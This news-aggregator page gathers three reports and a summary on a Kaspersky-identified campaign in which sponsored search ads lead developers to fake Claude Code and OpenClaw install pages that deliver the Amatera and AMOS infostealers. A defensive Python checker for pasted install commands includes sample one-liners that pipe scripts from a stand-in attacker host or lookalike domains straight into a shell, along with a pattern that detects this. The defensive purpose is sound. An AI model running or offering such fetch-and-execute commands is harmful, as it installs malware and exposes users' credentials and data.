3 Sources
[1]
Infostealers are being disguised as Claude Code, OpenClaw and other AI developer tools
* Kaspersky warns of malvertising campaign abusing Claude Code
* Fake download sites deliver Amatera infostealer on Windows, AMOS on macOS
* Developers risk exposing source code, corporate data, and credentials

Hackers are, once again, taking advantage of current trends to attack software developers with information-stealing malware. Earlier this week, security researchers at Kaspersky warned about an ongoing malvertising campaign targeting people interested in downloading Claude Code.

Claude Code is a coding-focused AI assistant developed by Anthropic. It is like a specialized version of the Claude GenAI chatbot, designed specifically to help software developers write, edit, and debug code and, in a sense, is similar to tools like GitHub Copilot, or ChatGPT's coding capabilities.

Infected with infostealers

According to Kaspersky, some people searching for "Claude Code download", "OpenClaw download", or similar tools will be shown a malicious ad at the very top of the search engine's results page. Clicking on those ads leads to websites that, in almost every aspect, look identical to the authentic pages set up by Anthropic and OpenAI.

To make matters worse, installing Claude Code is not the same as installing an app or a program. It requires copying and pasting code into the Windows Command Prompt or macOS Terminal, making the compromise even harder to spot.

Those who don't spot it, and try to install these fake assistants, will get a different infostealer depending on the operating system they are running. Those on Windows will end up getting Amatera, an information-stealing malware that collects data from user directories, web browsers, and cryptocurrency wallets. Kaspersky said it has previously observed Amatera in campaigns using the ClickFix distribution technique and that it is operated under a Malware-as-a-Service (MaaS) model.
On the other hand, macOS users will be infected with the infamous AMOS, a known macOS-oriented infostealer that has been used in countless campaigns against Apple users in the past.

"The campaign poses significant risks because AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations," said Kaspersky's cybersecurity expert Vladimir Gursky. "If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools."
[2]
Hackers are disguising malware as Claude Code, and it's easy to fall for the scam
Summary

* Researchers have discovered a new malware campaign targeting AI developer tools.
* The attack uses sponsored links on Google to impersonate official installation instructions.
* Targets include popular AI tools like Claude Code and OpenClaw.

With the exploding popularity of AI tools, it was only a matter of time before the hackers came calling. The latest run of AI-related malware targets developer tools like Claude Code and OpenClaw, and it's sneaky. Researchers at Kaspersky discovered a campaign targeting developers "looking for installation instructions for Claude Code," according to a post published March 16.

How the attack works

Malicious commands hiding in plain sight

Kaspersky found that when searching for the phrase "Claude Code download," sponsored ads appear at the top of the page (no surprise there). However, the researchers found that one of these ads redirects to a malicious page that looks a lot like the official installation instructions for Claude Code. The timing is unfortunate, as Claude has exploded in popularity over the last several weeks.

This malicious page is visually identical to the actual Claude Code instructions, down to the instructions themselves. The difference lies in the installation commands -- when you run the commands from this page, instead of installing Claude, you'll install malware. It seems whoever is behind these attacks is hoping users will just copy and paste the code without double-checking (which, unfortunately, is pretty common).
The attacks aren't just targeting Claude Code -- Kaspersky also found similar campaigns targeting "other popular AI tools," specifically naming the viral and very useful OpenClaw and Doubao (an AI tool from ByteDance). They're also not the first attacks of this type to target AI tools. Kaspersky claims it found a similar attack using Google Ads in December 2025.

What happens if you run the malicious commands?

If you run these fake commands, instead of installing Claude Code, you'll end up with one of two infostealers installed, depending on your OS:

* Windows: If you're on Windows, the commands will install Amatera. This malware "collects data from user directories, web browsers, and cryptocurrency wallets" and then sends that data off to a remote server. Kaspersky says Amatera has been used in previous campaigns.
* macOS: macOS users will get AMOS, an infostealer commonly used to target Apple devices.

Kaspersky's post highlights the fact that these attacks are specifically targeting developers, which in many cases means it's not just personal info but potentially also business data being stolen.

How to stay safe

Double-check everything!

These attacks are concerning, but should be avoidable as long as you're following basic security best practices. The researchers at Kaspersky offer the following suggestions (paraphrased):

* Verify links: Always check links, whether they're direct downloads or links to a download page. The malicious sites used in these attacks are hosted on Squarespace, and that's visible in the URL.
* Verify commands: Don't just blindly copy and paste terminal commands. Always review them before running them -- even if the source looks official.
* Make sure you understand what you're doing: Don't run commands if you don't know what they do.
* Use reliable security solutions: Have systems in place to detect malware.

Another key point not mentioned here is to follow official links in Google searches, rather than sponsored links.
While organic search results can be malicious, you're generally more likely to run into this sort of attack with sponsored links -- especially when the malicious site is attempting to impersonate a legit one.

Keep your eyes open out there -- I'd expect AI-related attacks like this to continue to increase in popularity.
[3]
Kaspersky discovers infostealers mimicking Claude Code, OpenClaw and other AI developer tools
In March 2026, Kaspersky Threat Research identified a new malicious campaign targeted at developers looking for installation instructions for Claude Code, a development agent created by Anthropic. When searching for "Claude Code download", sponsored advertisements appear at the top of the search results. One of these ads redirects users to a malicious webpage that closely imitates the official installation documentation for Claude Code. As a result, users are tricked into installing malware which harvests sensitive information including credentials, crypto wallet data, browser sessions, and other confidential files. Similar malicious campaigns mimic other popular AI tools, including OpenClaw.

[Figure: A fraudulent ad example]

The fake documentation page is visually identical to the legitimate one and is hosted on the website-building and hosting platform Squarespace. Because the page precisely copies the original instructions, users may not notice the difference when copying and executing installation commands.

[Figure: A fraudulent Claude page]

However, instead of installing the developer tool, the commands deliver malware to the victim's system. Depending on the operating system, the malicious commands deploy different infostealers:

* Windows systems receive Amatera, an information-stealing malware that collects data from user directories, web browsers, and cryptocurrency wallets before sending the stolen information to a remote server. Amatera has previously been observed in campaigns using the ClickFix distribution technique and is operated under a Malware-as-a-Service (MaaS) model.
* macOS systems receive AMOS, another infostealer previously documented in several malware campaigns targeting Apple devices. It has been described by Kaspersky before.

Kaspersky researchers also identified similar malicious campaigns targeting other popular AI tools, including OpenClaw and Doubao.
Using the same approach, attackers registered multiple domains and distributed files containing the Amatera infostealer while disguising them as legitimate downloads for these tools.

"The campaign poses significant risks because AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations. If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools," comments Vladimir Gursky, cybersecurity expert at Kaspersky.

In December 2025 Kaspersky detected that attackers spread a macOS infostealer using Google Ads. A specially generated chat interface designed to resemble a ChatGPT tutorial pretended to guide users through installing the Atlas Browser. The malicious instructions appeared to be hosted on a legitimate site associated with OpenAI, helping attackers gain users' trust.

To stay protected, Kaspersky recommends:

* Carefully verify download links and ensure they point to official project websites.
* Review any command-line instructions before executing them, especially if copied from external sources.
* Avoid following guides you did not specifically request or do not fully understand.
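
An added example, not part of the Kaspersky release or any vendor's tooling: one way to act on the advice to verify links and review commands before running a pasted installer one-liner. The official host `tool-vendor.example`, the lookalike hosts and the sample commands are constructed placeholders; substitute the hosts you have confirmed for the tool you are installing.

```python
import re
from urllib.parse import urlsplit

# Assumption: placeholder for hosts you have confirmed as the tool's official ones.
OFFICIAL_HOSTS = {"tool-vendor.example"}
# Website-builder hosting named in the report; a vendor installer served from it is suspect.
BUILDER_SUFFIXES = ("squarespace.com",)

URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.IGNORECASE)
# Download piped straight into an interpreter (POSIX shells or PowerShell iex).
PIPE_EXEC_RE = re.compile(
    r"\b(curl|wget|irm|iwr|invoke-webrequest|invoke-restmethod)\b.*\|\s*"
    r"(sudo\s+)?(sh|bash|zsh|iex|invoke-expression)\b",
    re.IGNORECASE | re.DOTALL,
)

def host_matches(host, domain):
    """True if host equals domain or is a subdomain of it (label-boundary match)."""
    return host == domain or host.endswith("." + domain)

def audit_install_command(command, official_hosts=OFFICIAL_HOSTS):
    """Return findings for a pasted install command; an empty list means nothing flagged."""
    findings = []
    for url in URL_RE.findall(command):
        # urlsplit resolves userinfo tricks such as https://official@other-host/...
        host = (urlsplit(url).hostname or "").lower().rstrip(".")
        if any(host_matches(host, s) for s in BUILDER_SUFFIXES):
            findings.append(f"website-builder-host: {host}")
        elif not any(host_matches(host, d) for d in official_hosts):
            findings.append(f"unofficial-host: {host}")
    if findings and PIPE_EXEC_RE.search(command):
        findings.append("executes-download-directly")
    return findings

# Constructed sample commands (not taken from the campaign).
SAMPLES = [
    "curl -fsSL https://tool-vendor.example/install.sh | bash",
    "curl -fsSL https://tool-vendor-docs.squarespace.com/install.sh | bash",
    "irm https://tool-vendor.example@attacker.example/i.ps1 | iex",
    "wget https://tool-vendor.example.attacker.example/setup -O setup",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(audit_install_command(cmd) or ["no findings"], "<-", cmd)
```

An empty result only means the visible URLs point at hosts you listed; the script that gets fetched still deserves a read before it runs.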
Kaspersky has uncovered a malicious campaign targeting software developers through fake Claude Code and OpenClaw installation pages. Attackers use sponsored Google ads to distribute Amatera and AMOS infostealers that harvest credentials, source code, and cryptocurrency wallet data. The attack exploits developers' trust in AI coding assistants.
Kaspersky researchers discovered in March 2026 a sophisticated malicious campaign targeting software developers searching for AI developer tools like Claude Code and OpenClaw [1]. The attack leverages sponsored Google search results to direct users to fraudulent installation pages that closely mimic official documentation [2]. When developers search for terms like "Claude Code download" or "OpenClaw download," malicious ads appear at the top of search results, redirecting to fake documentation pages hosted on Squarespace [3].

The fake documentation pages are visually identical to legitimate installation instructions, making them extremely difficult to distinguish from authentic sources [1]. The attack exploits a common developer practice of using copy and paste commands for installation. Instead of installing the intended AI coding assistant, the malicious commands deploy different infostealers based on the operating system. Windows users receive Amatera, an information-stealing malware that collects data from user directories, web browsers, and cryptocurrency wallets [3]. Kaspersky noted that Amatera operates under a Malware-as-a-Service (MaaS) model and has been observed in previous campaigns using the ClickFix distribution technique [1]. Meanwhile, macOS users are infected with AMOS, a notorious infostealer previously documented in multiple campaigns targeting Apple devices [2].

Vladimir Gursky, cybersecurity expert at Kaspersky, emphasized that this malicious campaign poses significant risks because AI developer tools are widely used by professional developers working in large organizations [3]. Infected victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts [1]. The campaign specifically targets developers who rely on AI-assisted coding tools, making it particularly dangerous for businesses. Beyond Claude Code and OpenClaw, Kaspersky identified similar attacks disguised as AI developer tools including Doubao, an AI tool from ByteDance [2].

This isn't the first time attackers have exploited interest in AI tools through malvertising. In December 2025, Kaspersky detected that attackers spread a macOS infostealer using Google Ads by creating a fake ChatGPT tutorial that guided users through installing the Atlas Browser [3]. The malicious instructions appeared to be hosted on a legitimate site associated with OpenAI, helping attackers gain users' trust. This pattern suggests that as AI coding assistants like Claude Code gain popularity, attackers will continue to create fake documentation pages and sponsored ads to distribute infostealer malware.

Kaspersky recommends several protective measures for developers. Always verify download links and ensure they point to official project websites rather than clicking on sponsored ads [2]. The malicious sites used in these attacks are hosted on Squarespace, which is visible in the URL and should raise suspicion. Review any command-line instructions before executing them, especially when copied from external sources, and avoid following guides you don't fully understand [3]. Implementing reliable security solutions that can detect infostealers like Amatera and AMOS is critical for organizations whose developers use AI-assisted coding tools. As AI tools continue gaining traction among software developers, expect these attacks targeting software developers to intensify, particularly through fake installation pages and malicious commands designed for stealing sensitive data including credentials and cryptocurrency wallet information.

Summarized by Navi